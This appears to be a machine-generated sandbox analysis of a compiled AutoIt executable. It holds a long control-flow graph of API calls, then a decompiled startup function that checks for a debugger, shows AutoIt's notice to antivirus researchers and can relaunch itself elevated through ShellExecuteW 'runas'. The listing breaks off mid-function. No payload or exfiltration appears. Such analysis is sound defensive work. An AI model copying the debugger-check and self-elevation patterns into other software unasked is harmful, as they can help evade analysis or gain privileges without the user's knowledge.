40ebb0 26865->26884 26871 40d737 26887 411951 26871->26887 26873 40d751 26899 40f4e0 SystemParametersInfoW SystemParametersInfoW 26873->26899 26875 40d75f 26900 40d590 GetCurrentDirectoryW 26875->26900 26877 40d767 SystemParametersInfoW 26878 40d794 26877->26878 26879 40d78d FreeLibrary 26877->26879 26880 408f40 VariantClear 26878->26880 26879->26878 26881 40d79d 26880->26881 26882 408f40 VariantClear 26881->26882 26883 40d7a6 26882->26883 26940 40ebd0 26884->26940 26944 4182cb 26887->26944 26889 41195e 26951 4181f2 
LeaveCriticalSection 26889->26951 26891 40d748 26892 4119b0 26891->26892 26893 4119d6 26892->26893 26894 4119bc 26892->26894 26893->26873 26894->26893 26998 417f77 46 API calls __getptd_noexit 26894->26998 26896 4119c6 26999 417f25 10 API calls __filbuf 26896->26999 26898 4119d1 26898->26873 26899->26875 27000 401f20 26900->27000 26902 40d5b6 IsDebuggerPresent 26903 40d5c4 26902->26903 26904 42e1bb MessageBoxA 26902->26904 26905 42e1d4 26903->26905 26906 40d5e3 26903->26906 26904->26905 27171 403a50 52 API calls 3 library calls 26905->27171 27070 40f520 26906->27070 26910 40d5fd GetFullPathNameW 27082 401460 26910->27082 26912 40d63b 26913 40d643 26912->26913 26914 42e231 SetCurrentDirectoryW 26912->26914 26915 40d64c 26913->26915 27172 432fee 6 API calls 26913->27172 26914->26913 27097 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 26915->27097 26918 42e252 26918->26915 26920 42e25a GetModuleFileNameW 26918->26920 26922 42e274 26920->26922 26923 42e2cb GetForegroundWindow ShellExecuteW 26920->26923 26924 401b10 52 API calls 26922->26924 26928 40d688 26923->26928 26929 42e281 26924->26929 26925 40d669 27105 4091e0 26925->27105 26926 40d656 26926->26925 27169 40e0c0 74 API calls _memset 26926->27169 26932 40d692 SetCurrentDirectoryW 26928->26932 27173 40d200 52 API calls 2 library calls 26929->27173 26932->26877 26934 42e28d 27174 40d200 52 API calls 2 library calls 26934->27174 26937 42e299 GetForegroundWindow ShellExecuteW 26938 42e2c6 26937->26938 26938->26928 26939 40ec00 LoadLibraryA GetProcAddress 26939->26871 26941 40d72e 26940->26941 26942 40ebd6 LoadLibraryA 26940->26942 26941->26871 26941->26939 26942->26941 26943 40ebe7 GetProcAddress 26942->26943 26943->26941 26945 4182e0 26944->26945 26946 4182f3 EnterCriticalSection 26944->26946 26952 418209 26945->26952 26946->26889 26948 4182e6 26948->26946 26979 411924 46 API calls 3 library calls 26948->26979 26950 4182f2 26950->26946 26951->26891 26953 418215 __write 26952->26953 26954 418225 
26953->26954 26955 41823d 26953->26955 26980 418901 46 API calls __NMSG_WRITE 26954->26980 26963 41824b __write 26955->26963 26982 416b04 26955->26982 26958 41822a 26981 418752 46 API calls 7 library calls 26958->26981 26961 41825d 26988 417f77 46 API calls __getptd_noexit 26961->26988 26962 41826c 26966 4182cb __lock 45 API calls 26962->26966 26963->26948 26964 418231 26967 411682 __mtinitlocknum 3 API calls 26964->26967 26968 418273 26966->26968 26969 41823b 26967->26969 26970 4182a6 26968->26970 26971 41827b InitializeCriticalSectionAndSpinCount 26968->26971 26969->26955 26972 413748 _free 45 API calls 26970->26972 26973 418297 26971->26973 26974 41828b 26971->26974 26972->26973 26996 4182c2 LeaveCriticalSection _doexit 26973->26996 26989 413748 26974->26989 26977 418291 26995 417f77 46 API calls __getptd_noexit 26977->26995 26979->26950 26980->26958 26981->26964 26985 416b0d 26982->26985 26983 4135bb _malloc 45 API calls 26983->26985 26984 416b43 26984->26961 26984->26962 26985->26983 26985->26984 26986 416b24 Sleep 26985->26986 26987 416b39 26986->26987 26987->26984 26987->26985 26988->26963 26990 41377c _free 26989->26990 26991 413753 RtlFreeHeap 26989->26991 26990->26977 26991->26990 26992 413768 26991->26992 26997 417f77 46 API calls __getptd_noexit 26992->26997 26994 41376e GetLastError 26994->26990 26995->26973 26996->26963 26997->26994 26998->26896 26999->26898 27175 40e6e0 27000->27175 27004 401f41 GetModuleFileNameW 27193 410100 27004->27193 27006 401f5c 27205 410960 27006->27205 27009 401b10 52 API calls 27010 401f81 27009->27010 27208 401980 27010->27208 27012 401f8e 27013 408f40 VariantClear 27012->27013 27014 401f9d 27013->27014 27015 401b10 52 API calls 27014->27015 27016 401fb4 27015->27016 27017 401980 53 API calls 27016->27017 27018 401fc3 27017->27018 27019 401b10 52 API calls 27018->27019 27020 401fd2 27019->27020 27216 40c2c0 27020->27216 27022 401fe1 27023 40bc70 52 API calls 27022->27023 27024 401ff3 27023->27024 27234 401a10 27024->27234 
27026 401ffe 27241 4114ab 27026->27241 27029 428b05 27031 401a10 52 API calls 27029->27031 27030 402017 27032 4114ab __wcsicoll 58 API calls 27030->27032 27033 428b18 27031->27033 27034 402022 27032->27034 27036 401a10 52 API calls 27033->27036 27034->27033 27035 40202d 27034->27035 27037 4114ab __wcsicoll 58 API calls 27035->27037 27038 428b33 27036->27038 27039 402038 27037->27039 27041 428b3b GetModuleFileNameW 27038->27041 27040 402043 27039->27040 27039->27041 27042 4114ab __wcsicoll 58 API calls 27040->27042 27043 401a10 52 API calls 27041->27043 27044 40204e 27042->27044 27045 428b6c 27043->27045 27048 401a10 52 API calls 27044->27048 27050 428b90 _wcscpy 27044->27050 27061 402092 27044->27061 27253 40e0a0 27045->27253 27053 402073 _wcscpy 27048->27053 27049 401a10 52 API calls 27054 428b88 27049->27054 27056 401a10 52 API calls 27050->27056 27051 428bc6 27052 4020a3 27052->27051 27249 40e830 53 API calls 27052->27249 27059 401a10 52 API calls 27053->27059 27054->27050 27065 4020d0 27056->27065 27057 4020bb 27250 40cf00 53 API calls 27057->27250 27059->27061 27060 4020c6 27062 408f40 VariantClear 27060->27062 27061->27050 27061->27052 27062->27065 27064 402110 27067 408f40 VariantClear 27064->27067 27065->27064 27068 401a10 52 API calls 27065->27068 27251 40cf00 53 API calls 27065->27251 27252 40e6a0 53 API calls 27065->27252 27069 402120 moneypunct 27067->27069 27068->27065 27069->26902 27071 4295c9 _memset 27070->27071 27072 40f53c 27070->27072 27074 4295d9 GetOpenFileNameW 27071->27074 28096 410120 27072->28096 27074->27072 27076 40d5f5 27074->27076 27075 40f545 28100 4102b0 SHGetMalloc 27075->28100 27076->26910 27076->26912 27078 40f54c 28105 410190 GetFullPathNameW 27078->28105 27080 40f559 28116 40f570 27080->28116 28170 402400 27082->28170 27084 40146f 27087 428c29 _wcscat 27084->27087 28179 401500 27084->28179 27086 40147c 27086->27087 28187 40d440 27086->28187 27089 401489 27089->27087 27090 401491 GetFullPathNameW 27089->27090 27091 402160 52 API 
calls 27090->27091 27092 4014bb 27091->27092 27093 402160 52 API calls 27092->27093 27094 4014c8 27093->27094 27094->27087 27095 402160 52 API calls 27094->27095 27096 4014ee 27095->27096 27096->26912 27098 428361 27097->27098 27099 4103fc LoadImageW RegisterClassExW 27097->27099 28237 44395e EnumResourceNamesW LoadImageW 27098->28237 28236 410490 7 API calls 27099->28236 27102 40d651 27104 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 27102->27104 27103 428368 27104->26926 27106 409202 27105->27106 27107 42d7ad 27105->27107 27126 409216 moneypunct 27106->27126 28326 410940 294 API calls 27106->28326 28327 45e737 90 API calls 3 library calls 27107->28327 27110 409386 27111 40939c 27110->27111 27112 40f190 10 API calls 27110->27112 27111->26928 27170 401000 Shell_NotifyIconW _memset 27111->27170 27113 4095b2 27112->27113 27113->27111 27115 401a50 272 API calls 27113->27115 27114 409253 PeekMessageW 27114->27126 27117 4095c6 LockWindowUpdate KiUserCallbackDispatcher GetMessageW 27115->27117 27116 42d8cd Sleep 27116->27126 27117->27111 27120 4095f9 27117->27120 27119 42e13b 28341 40d410 VariantClear 27119->28341 27123 42e158 TranslateMessage DispatchMessageW GetMessageW 27120->27123 27123->27111 27123->27123 27125 409567 PeekMessageW 27125->27126 27126->27110 27126->27114 27126->27116 27126->27119 27126->27125 27129 46f3c1 97 API calls 27126->27129 27130 40e0a0 52 API calls 27126->27130 27132 42dcd2 WaitForSingleObject 27126->27132 27133 409551 TranslateMessage DispatchMessageW 27126->27133 27136 42dd3d Sleep 27126->27136 27137 47d33e 272 API calls 27126->27137 27141 4094cf Sleep 27126->27141 27142 42d94d timeGetTime 27126->27142 27144 40d410 VariantClear 27126->27144 27150 4094e0 27126->27150 27159 45e737 90 API calls 27126->27159 27161 408cc0 141 API calls 27126->27161 27162 42e0cc VariantClear 27126->27162 27163 408f40 VariantClear 27126->27163 28238 4091b0 27126->28238 28296 40afa0 27126->28296 28322 4096a0 294 API calls 4 library calls 27126->28322 
28323 408fc0 200 API calls moneypunct 27126->28323 28324 40d150 TranslateAcceleratorW 27126->28324 28325 40d170 IsDialogMessageW GetClassLongW 27126->28325 28328 465124 53 API calls 27126->28328 28329 40c620 timeGetTime 27126->28329 28340 40e270 VariantClear moneypunct 27126->28340 27128 44c29d 52 API calls 27128->27150 27129->27126 27130->27126 27131 46fdbf 98 API calls 27131->27150 27132->27126 27138 42dcf0 GetExitCodeProcess CloseHandle 27132->27138 27133->27125 27136->27150 27137->27126 28334 40d410 VariantClear 27138->28334 27141->27150 28330 465124 53 API calls 27142->28330 27144->27126 27146 40c620 timeGetTime 27146->27150 27148 465124 53 API calls 27148->27150 27150->27126 27150->27128 27150->27131 27150->27146 27150->27148 27151 42dd89 CloseHandle 27150->27151 27153 42de19 GetExitCodeProcess CloseHandle 27150->27153 27154 403cd0 VariantClear 27150->27154 27156 42de88 Sleep 27150->27156 27164 401b10 52 API calls 27150->27164 27166 401980 53 API calls 27150->27166 27168 408f40 VariantClear 27150->27168 28331 45178a 54 API calls 27150->28331 28332 47d33e 294 API calls 27150->28332 28333 453bc6 54 API calls 27150->28333 28335 40d410 VariantClear 27150->28335 28336 443d19 67 API calls _wcslen 27150->28336 28337 4574b4 VariantClear 27150->28337 28338 4731e1 VariantClear 27150->28338 28339 4331a2 6 API calls 27150->28339 27151->27150 27153->27150 27154->27156 27156->27126 27159->27126 27161->27126 27162->27126 27163->27126 27164->27150 27166->27150 27168->27150 27169->26925 27170->26928 27171->26912 27172->26918 27173->26934 27174->26937 27176 40bc70 52 API calls 27175->27176 27177 401f31 27176->27177 27178 402560 27177->27178 27179 40256d __write_nolock 27178->27179 27257 402160 27179->27257 27182 402593 27192 4025bd 27182->27192 27270 401c90 27182->27270 27184 4026a7 27185 401b10 52 API calls 27184->27185 27191 4026db 27184->27191 27186 4026d1 27185->27186 27281 40d7c0 52 API calls 2 library calls 27186->27281 27187 401b10 52 API calls 27187->27192 27189 401c90 
52 API calls 27189->27192 27191->27004 27192->27184 27192->27187 27192->27189 27273 4026f0 27192->27273 27280 40d7c0 52 API calls 2 library calls 27192->27280 27290 40f760 27193->27290 27196 410118 27196->27006 27198 42805d 27199 42806a 27198->27199 27346 431e58 27198->27346 27201 413748 _free 46 API calls 27199->27201 27202 428078 27201->27202 27203 431e58 82 API calls 27202->27203 27204 428084 27203->27204 27204->27006 27206 4115d7 52 API calls 27205->27206 27207 401f74 27206->27207 27207->27009 27209 4019a3 27208->27209 27210 401985 27208->27210 27209->27210 27211 4019b8 27209->27211 27213 40199f 27210->27213 27214 403e10 53 API calls 27210->27214 27212 403e10 53 API calls 27211->27212 27215 4019c4 27212->27215 27213->27012 27214->27213 27215->27012 27217 40c2c7 27216->27217 27218 40c30e 27216->27218 27219 40c2d3 27217->27219 27220 426c79 27217->27220 27221 40c315 27218->27221 27222 426c2b 27218->27222 28085 403ea0 52 API calls __cinit 27219->28085 28090 4534e3 52 API calls 27220->28090 27226 40c321 27221->27226 27227 426c5a 27221->27227 27224 426c4b 27222->27224 27225 426c2e 27222->27225 28088 4534e3 52 API calls 27224->28088 27232 40c2de 27225->27232 28087 4534e3 52 API calls 27225->28087 28086 403ea0 52 API calls __cinit 27226->28086 28089 4534e3 52 API calls 27227->28089 27232->27022 27235 401a30 27234->27235 27236 401a17 27234->27236 27238 402160 52 API calls 27235->27238 27237 401a2d 27236->27237 28091 403c30 52 API calls _memmove 27236->28091 27237->27026 27239 401a3d 27238->27239 27239->27026 27242 411523 27241->27242 27243 4114ba 27241->27243 28094 4113a8 58 API calls 3 library calls 27242->28094 27248 40200c 27243->27248 28092 417f77 46 API calls __getptd_noexit 27243->28092 27246 4114c6 28093 417f25 10 API calls __filbuf 27246->28093 27248->27029 27248->27030 27249->27057 27250->27060 27251->27065 27252->27065 27254 40e0b2 27253->27254 27255 40e0a8 27253->27255 27254->27049 28095 403c30 52 API calls _memmove 27255->28095 27258 426daa 27257->27258 
27259 40216b _wcslen 27257->27259 27284 40c600 27258->27284 27262 402180 27259->27262 27263 40219e 27259->27263 27261 426db5 27261->27182 27282 403bd0 52 API calls moneypunct 27262->27282 27283 4013a0 52 API calls 27263->27283 27266 402187 _memmove 27266->27182 27267 4021a5 27268 426db7 27267->27268 27269 4115d7 52 API calls 27267->27269 27269->27266 27271 4026f0 52 API calls 27270->27271 27272 401c97 27271->27272 27272->27182 27274 426873 27273->27274 27275 4026ff 27273->27275 27289 4013a0 52 API calls 27274->27289 27275->27192 27277 42687b 27278 4115d7 52 API calls 27277->27278 27279 42689e _memmove 27278->27279 27279->27192 27280->27192 27281->27191 27282->27266 27283->27267 27285 40c619 27284->27285 27286 40c60a 27284->27286 27285->27261 27286->27285 27287 4026f0 52 API calls 27286->27287 27288 426d7a _memmove 27287->27288 27288->27261 27289->27277 27350 40f6f0 27290->27350 27292 40f77b moneypunct 27358 40f850 27292->27358 27298 40f7fc 27299 427c2a 27298->27299 27300 40f804 27298->27300 27388 414d04 27299->27388 27375 414a46 27300->27375 27305 40f80e 27305->27196 27309 4528bd 27305->27309 27306 427c59 27394 414fe2 27306->27394 27308 427c79 27310 4150d1 _fseek 81 API calls 27309->27310 27311 452930 27310->27311 28027 452719 27311->28027 27314 452948 27314->27198 27315 414d04 __fread_nolock 61 API calls 27316 452966 27315->27316 27317 414d04 __fread_nolock 61 API calls 27316->27317 27318 452976 27317->27318 27319 414d04 __fread_nolock 61 API calls 27318->27319 27320 45298f 27319->27320 27321 414d04 __fread_nolock 61 API calls 27320->27321 27322 4529aa 27321->27322 27323 4150d1 _fseek 81 API calls 27322->27323 27324 4529c4 27323->27324 27325 4135bb _malloc 46 API calls 27324->27325 27326 4529cf 27325->27326 27327 4135bb _malloc 46 API calls 27326->27327 27328 4529db 27327->27328 27329 414d04 __fread_nolock 61 API calls 27328->27329 27330 4529ec 27329->27330 27331 44afef GetSystemTimeAsFileTime 27330->27331 27332 452a00 27331->27332 27333 452a36 27332->27333 27334 
452a13 27332->27334 27335 452aa5 27333->27335 27336 452a3c 27333->27336 27337 413748 _free 46 API calls 27334->27337 27339 413748 _free 46 API calls 27335->27339 28033 44b1a9 27336->28033 27340 452a1c 27337->27340 27342 452aa3 27339->27342 27343 413748 _free 46 API calls 27340->27343 27341 452a9d 27344 413748 _free 46 API calls 27341->27344 27342->27198 27345 452a25 27343->27345 27344->27342 27345->27198 27347 431e64 27346->27347 27348 431e6a 27346->27348 27349 414a46 82 API calls 27347->27349 27348->27199 27349->27348 27351 425de2 27350->27351 27354 40f6fc _wcslen 27350->27354 27351->27292 27352 40f710 WideCharToMultiByte 27353 40f756 27352->27353 27355 40f728 27352->27355 27353->27292 27354->27352 27356 4115d7 52 API calls 27355->27356 27357 40f735 WideCharToMultiByte 27356->27357 27357->27292 27360 40f85d _memset _strlen 27358->27360 27359 426b3b 27360->27359 27362 40f7ab 27360->27362 27407 414db8 27360->27407 27363 4149c2 27362->27363 27422 414904 27363->27422 27365 40f7e9 27365->27299 27366 40f5c0 27365->27366 27371 40f5cd __write_nolock _memmove 27366->27371 27367 414d04 __fread_nolock 61 API calls 27367->27371 27368 40f691 __tzset_nolock 27368->27298 27370 425d11 27372 4150d1 _fseek 81 API calls 27370->27372 27371->27367 27371->27368 27371->27370 27620 4150d1 27371->27620 27373 425d33 27372->27373 27374 414d04 __fread_nolock 61 API calls 27373->27374 27374->27368 27376 414a52 __write 27375->27376 27377 414a64 27376->27377 27378 414a79 27376->27378 27776 417f77 46 API calls __getptd_noexit 27377->27776 27381 415471 __lock_file 47 API calls 27378->27381 27384 414a74 __write 27378->27384 27380 414a69 27777 417f25 10 API calls __filbuf 27380->27777 27383 414a92 27381->27383 27760 4149d9 27383->27760 27384->27305 27832 414c76 27388->27832 27390 414d1c 27391 44afef 27390->27391 28020 442c5a 27391->28020 27393 44b00d 27393->27306 27395 414fee __write 27394->27395 27396 414ffa 27395->27396 27397 41500f 27395->27397 28024 417f77 46 API calls __getptd_noexit 
27396->28024 27399 415471 __lock_file 47 API calls 27397->27399 27401 415017 27399->27401 27400 414fff 28025 417f25 10 API calls __filbuf 27400->28025 27403 414e4e __ftell_nolock 51 API calls 27401->27403 27404 415024 27403->27404 28026 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 27404->28026 27406 41500a __write 27406->27308 27408 414dd6 27407->27408 27409 414deb 27407->27409 27418 417f77 46 API calls __getptd_noexit 27408->27418 27409->27408 27410 414df2 27409->27410 27420 41b91b 79 API calls 10 library calls 27410->27420 27413 414ddb 27419 417f25 10 API calls __filbuf 27413->27419 27414 414e18 27416 414de6 27414->27416 27421 418f98 77 API calls 5 library calls 27414->27421 27416->27360 27418->27413 27419->27416 27420->27414 27421->27416 27425 414910 __write 27422->27425 27423 414923 27478 417f77 46 API calls __getptd_noexit 27423->27478 27425->27423 27427 414951 27425->27427 27426 414928 27479 417f25 10 API calls __filbuf 27426->27479 27441 41d4d1 27427->27441 27430 414956 27431 41496a 27430->27431 27432 41495d 27430->27432 27433 414992 27431->27433 27434 414972 27431->27434 27480 417f77 46 API calls __getptd_noexit 27432->27480 27458 41d218 27433->27458 27481 417f77 46 API calls __getptd_noexit 27434->27481 27438 414933 __write @_EH4_CallFilterFunc@8 27438->27365 27442 41d4dd __write 27441->27442 27443 4182cb __lock 46 API calls 27442->27443 27454 41d4eb 27443->27454 27444 41d567 27446 416b04 __malloc_crt 46 API calls 27444->27446 27448 41d56e 27446->27448 27447 41d5f0 __write 27447->27430 27449 41d57c InitializeCriticalSectionAndSpinCount 27448->27449 27456 41d560 27448->27456 27451 41d59c 27449->27451 27452 41d5af EnterCriticalSection 27449->27452 27455 413748 _free 46 API calls 27451->27455 27452->27456 27453 418209 __mtinitlocknum 46 API calls 27453->27454 27454->27444 27454->27453 27454->27456 27486 4154b2 47 API calls __lock 27454->27486 27487 415520 LeaveCriticalSection LeaveCriticalSection _doexit 27454->27487 27455->27456 27483 41d5fb 
27456->27483 27459 41d23a 27458->27459 27460 41d255 27459->27460 27472 41d26c __wopenfile 27459->27472 27492 417f77 46 API calls __getptd_noexit 27460->27492 27461 41d421 27464 41d47a 27461->27464 27465 41d48c 27461->27465 27463 41d25a 27493 417f25 10 API calls __filbuf 27463->27493 27497 417f77 46 API calls __getptd_noexit 27464->27497 27489 422bf9 27465->27489 27469 41d47f 27498 417f25 10 API calls __filbuf 27469->27498 27470 41499d 27482 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 27470->27482 27472->27461 27472->27464 27494 41341f 58 API calls 2 library calls 27472->27494 27474 41d41a 27474->27461 27495 41341f 58 API calls 2 library calls 27474->27495 27476 41d439 27476->27461 27496 41341f 58 API calls 2 library calls 27476->27496 27478->27426 27479->27438 27480->27438 27481->27438 27482->27438 27488 4181f2 LeaveCriticalSection 27483->27488 27485 41d602 27485->27447 27486->27454 27487->27454 27488->27485 27499 422b35 27489->27499 27491 422c14 27491->27470 27492->27463 27493->27470 27494->27474 27495->27476 27496->27461 27497->27469 27498->27470 27502 422b41 __write 27499->27502 27500 422b54 27617 417f77 46 API calls __getptd_noexit 27500->27617 27502->27500 27504 422b8a 27502->27504 27503 422b59 27618 417f25 10 API calls __filbuf 27503->27618 27510 422400 27504->27510 27507 422ba4 27619 422bcb LeaveCriticalSection __unlock_fhandle 27507->27619 27509 422b63 __write 27509->27491 27511 422427 27510->27511 27512 414021 __tsopen_nolock 46 API calls 27511->27512 27519 422443 27512->27519 27513 4226b2 27514 417ed3 __invoke_watson 10 API calls 27513->27514 27516 422b34 __write 27514->27516 27515 422482 27517 417f8a __write 46 API calls 27515->27517 27518 422b54 27516->27518 27524 422b8a 27516->27524 27520 422487 27517->27520 27521 417f77 __filbuf 46 API calls 27518->27521 27519->27513 27519->27515 27526 4224dd 27519->27526 27522 417f77 __filbuf 46 API calls 27520->27522 27523 422b59 27521->27523 27525 422491 27522->27525 27527 417f25 __filbuf 10 API 
calls 27523->27527 27529 422400 __tsopen_nolock 100 API calls 27524->27529 27530 417f25 __filbuf 10 API calls 27525->27530 27528 422564 27526->27528 27537 422537 27526->27537 27536 422b63 __write 27527->27536 27531 417f8a __write 46 API calls 27528->27531 27532 422ba4 27529->27532 27542 42249b 27530->27542 27533 422569 27531->27533 27534 422bcb __wsopen_helper LeaveCriticalSection 27532->27534 27535 417f77 __filbuf 46 API calls 27533->27535 27534->27536 27538 422573 27535->27538 27536->27507 27540 41af1c __alloc_osfhnd 51 API calls 27537->27540 27539 417f25 __filbuf 10 API calls 27538->27539 27539->27542 27541 4225f5 27540->27541 27543 4225fe 27541->27543 27544 42261f CreateFileW 27541->27544 27542->27507 27545 417f8a __write 46 API calls 27543->27545 27546 4226bc GetFileType 27544->27546 27547 42264c 27544->27547 27548 422603 27545->27548 27549 4226c9 GetLastError 27546->27549 27550 42270d 27546->27550 27551 422685 GetLastError 27547->27551 27554 422660 CreateFileW 27547->27554 27552 417f77 __filbuf 46 API calls 27548->27552 27553 417f9d __dosmaperr 46 API calls 27549->27553 27561 41ace6 __set_osfhnd 47 API calls 27550->27561 27555 417f9d __dosmaperr 46 API calls 27551->27555 27556 42260d 27552->27556 27557 4226f2 CloseHandle 27553->27557 27554->27546 27554->27551 27558 4226ac 27555->27558 27559 417f77 __filbuf 46 API calls 27556->27559 27557->27558 27560 422700 27557->27560 27562 417f77 __filbuf 46 API calls 27558->27562 27559->27542 27563 417f77 __filbuf 46 API calls 27560->27563 27566 42272b 27561->27566 27562->27513 27564 422705 27563->27564 27564->27558 27565 422942 27565->27513 27568 422aaa CloseHandle CreateFileW 27565->27568 27566->27565 27567 41e17f __lseek_nolock 48 API calls 27566->27567 27570 422799 27566->27570 27569 42278b 27567->27569 27571 422ad7 GetLastError 27568->27571 27572 422b05 27568->27572 27573 422794 27569->27573 27574 4227ad 27569->27574 27570->27565 27579 42294b 27570->27579 27582 4227a1 27570->27582 27591 42289b 27570->27591 27575 
417f9d __dosmaperr 46 API calls 27571->27575 27572->27513 27576 417f8a __write 46 API calls 27573->27576 27577 41da15 __read_nolock 56 API calls 27574->27577 27578 422ae3 27575->27578 27576->27570 27580 4227be 27577->27580 27581 41ad67 __free_osfhnd 47 API calls 27578->27581 27579->27565 27590 422968 27579->27590 27595 4228bf 27579->27595 27584 4227df 27580->27584 27588 4227cc 27580->27588 27581->27572 27587 41d762 __close_nolock 49 API calls 27582->27587 27583 422913 27586 41da15 __read_nolock 56 API calls 27583->27586 27585 41e17f __lseek_nolock 48 API calls 27584->27585 27585->27570 27603 422920 27586->27603 27587->27558 27589 4238da __chsize_nolock 80 API calls 27588->27589 27592 4227d8 27589->27592 27593 420494 __lseeki64_nolock 48 API calls 27590->27593 27591->27565 27591->27583 27591->27595 27596 4228ea 27591->27596 27592->27582 27592->27584 27594 422973 27593->27594 27594->27595 27598 42297e 27594->27598 27595->27565 27595->27582 27599 41b7b2 __write 77 API calls 27595->27599 27597 420494 __lseeki64_nolock 48 API calls 27596->27597 27605 4228f5 27597->27605 27606 420494 __lseeki64_nolock 48 API calls 27598->27606 27599->27595 27600 4229c3 27602 4229e5 27600->27602 27604 4229ca 27600->27604 27601 4229a9 27608 41d762 __close_nolock 49 API calls 27601->27608 27607 41e17f __lseek_nolock 48 API calls 27602->27607 27603->27565 27603->27582 27603->27600 27603->27601 27603->27602 27609 41e17f __lseek_nolock 48 API calls 27604->27609 27605->27595 27610 4228fc 27605->27610 27611 422988 27606->27611 27613 42298d 27607->27613 27612 4229b0 27608->27612 27609->27613 27614 420494 __lseeki64_nolock 48 API calls 27610->27614 27611->27613 27615 417f77 __filbuf 46 API calls 27612->27615 27613->27565 27613->27582 27616 422906 27614->27616 27615->27513 27616->27582 27616->27583 27617->27503 27618->27509 27619->27509 27623 4150dd __write 27620->27623 27621 4150e9 27651 417f77 46 API calls __getptd_noexit 27621->27651 27623->27621 27624 41510f 27623->27624 27633 415471 
27624->27633 27626 4150ee 27652 417f25 10 API calls __filbuf 27626->27652 27632 4150f9 __write 27632->27371 27634 415483 27633->27634 27635 4154a5 EnterCriticalSection 27633->27635 27634->27635 27636 41548b 27634->27636 27638 415117 27635->27638 27637 4182cb __lock 46 API calls 27636->27637 27637->27638 27639 415047 27638->27639 27640 415067 27639->27640 27641 415057 27639->27641 27646 415079 27640->27646 27654 414e4e 27640->27654 27709 417f77 46 API calls __getptd_noexit 27641->27709 27645 41505c 27653 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 27645->27653 27671 41443c 27646->27671 27649 4150b9 27684 41e1f4 27649->27684 27651->27626 27652->27632 27653->27632 27655 414e61 27654->27655 27656 414e79 27654->27656 27710 417f77 46 API calls __getptd_noexit 27655->27710 27657 414139 __filbuf 46 API calls 27656->27657 27659 414e80 27657->27659 27662 41e1f4 __write 51 API calls 27659->27662 27660 414e66 27711 417f25 10 API calls __filbuf 27660->27711 27663 414e97 27662->27663 27664 414f09 27663->27664 27666 414ec9 27663->27666 27670 414e71 27663->27670 27712 417f77 46 API calls __getptd_noexit 27664->27712 27667 41e1f4 __write 51 API calls 27666->27667 27666->27670 27668 414f64 27667->27668 27669 41e1f4 __write 51 API calls 27668->27669 27668->27670 27669->27670 27670->27646 27672 414477 27671->27672 27673 414455 27671->27673 27677 414139 27672->27677 27673->27672 27674 414139 __filbuf 46 API calls 27673->27674 27675 414470 27674->27675 27713 41b7b2 77 API calls 4 library calls 27675->27713 27678 414145 27677->27678 27679 41415a 27677->27679 27714 417f77 46 API calls __getptd_noexit 27678->27714 27679->27649 27681 41414a 27715 417f25 10 API calls __filbuf 27681->27715 27683 414155 27683->27649 27685 41e200 __write 27684->27685 27686 41e223 27685->27686 27687 41e208 27685->27687 27689 41e22f 27686->27689 27694 41e269 27686->27694 27736 417f8a 46 API calls __getptd_noexit 27687->27736 27738 417f8a 46 API calls __getptd_noexit 27689->27738 27690 41e20d 27737 

                                  Control-flow Graph

                                  C-Code - Quality: 98%
                                  			E0040D590(short* __eax, char __ecx, void* __eflags, void* __fp0) {
                                  				char _v5;
                                  				char _v6;
                                  				short* _v24;
                                  				short _v556;
                                  				short _v1084;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t25;
                                  				intOrPtr _t28;
                                  				int _t31;
                                  				char _t32;
                                  				void* _t53;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				char _t60;
                                  				short* _t73;
                                  				void* _t80;
                                  
                                  				_t89 = __fp0;
                                  				_t80 = __eflags;
                                  				_t60 = __ecx;
                                  				_t73 = __eax;
                                  				GetCurrentDirectoryW(0x104,  &_v556);
                                  				E00401F20(_t60, _t80, _t73); // executed
                                  				if(IsDebuggerPresent() != 0) {
                                  					return MessageBoxA(0, "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.", 0x484c92, 0x10);
                                  				}
                                  				_t25 =  *0x4a7f54; // 0x4
                                  				if(_t25 == 0) {
                                  					 *0x4974f4 = 0xffffffff;
                                  					return SetCurrentDirectoryW( &_v556);
                                  					L12:
                                  				}
                                  				_v5 = 0;
                                  				if(_t25 == 1) {
                                  					_t56 =  *0x4a7f5c; // 0xa52f18
                                  					_v6 = 0;
                                  					E00403A50(_t56, _t60, 0x4a90e8, 1, 0xffffffff);
                                  					_t69 =  *0x4974e8;
                                  					_t57 = _v6;
                                  					 *0x4a90eb =  *0x4974e8;
                                  					L5:
                                  					_t28 =  *0x4a7f54; // 0x4
                                  					if(E00401460(_t60, _t69, ?str?, _t28) != 0) {
                                  						E0040EC50(0x4a90e8);
                                  						_t31 = SetCurrentDirectoryW( &_v556);
                                  						 *0x4974f4 = 1;
                                  						return _t31;
                                  					}
                                  					if(_t57 == 1) {
                                  						_t32 = E00432FEE();
                                  						__eflags = _t32;
                                  						if(_t32 != 0) {
                                  							goto L7;
                                  						}
                                  						GetModuleFileNameW(0,  &_v1084, 0x104);
                                  						__eflags = _v5;
                                  						if(__eflags == 0) {
                                  							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _t73,  &_v556, 1);
                                  						} else {
                                  							_t79 =  &_v24;
                                  							E00401B10("\"",  &_v24, __eflags);
                                  							E0040D200(_t79, _t60, 0x4a7f6c, _t89);
                                  							E0040D200(_t79, _t60, "\"", _t89);
                                  							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _v24,  &_v556, 1);
                                  							E00402250(_t79);
                                  						}
                                  						L11:
                                  						E0040EC50(0x4a90e8);
                                  						return SetCurrentDirectoryW( &_v556);
                                  						goto L12;
                                  					}
                                  					L7:
                                  					E00410390(); // executed
                                  					E00410570();
                                  					if( *0x4a7f58 == 0) {
                                  						E0040E0C0(0x4a8710, _t89);
                                  					}
                                  					E004091E0(0x4a8178, _t69, _t89, 1); // executed
                                  					if( *0x4a7f58 == 0) {
                                  						E00401000(0x4a8710);
                                  					}
                                  					goto L11;
                                  				}
                                  				_t53 = E0040F520(0x4a7f6c, 0x4a90e8, __fp0, 0x4a7f54); // executed
                                  				if(_t53 == 0) {
                                  					 *0x4974f4 = 1;
                                  					return SetCurrentDirectoryW( &_v556);
                                  					goto L12;
                                  				} else {
